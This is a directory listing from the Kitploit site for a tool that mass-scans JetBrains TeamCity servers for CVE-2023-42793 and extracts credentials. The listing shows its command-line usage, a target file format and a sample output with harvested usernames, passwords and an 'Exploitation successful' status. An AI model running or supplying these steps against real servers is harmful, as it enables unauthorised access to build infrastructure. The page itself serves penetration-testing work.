Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-42793 — Batch vulnerability scanner for CVE-2023-42793 targeting JetBrains TeamCity servers. Automates credential extraction and login URL discovery across multiple hosts. | Kitploit
Tools/GitHubGitHub/ddestinys/cve-2023-42793
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubddestinys/cve-2023-42793

CVE-2023-42793

Batch vulnerability scanner for CVE-2023-42793 targeting JetBrains TeamCity servers. Automates credential extraction and login URL discovery across multiple hosts.

View Repository
18 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
root@kitploit:~
# Batch scan
python teamcity_scan.py -f targets.txt -o results.txt

# Single target
python teamcity_scan.py -u http://target.com:8111 -o result.txt

# Specify thread count
python teamcity_scan.py -f urls.txt -t 20 -o vuln.txt

Target file format (targets.txt):

root@kitploit:~
http://192.168.1.100:8111
https://teamcity.example.com
10.0.0.1:8111
example.com

Output format (results.txt):

root@kitploit:~
Target: http://192.168.1.100:8111
Username: TeamCityUser1234
Password: TeamCity@2023
Login URL: http://192.168.1.100:8111/login.html
Status: Exploitation successful
Download Tool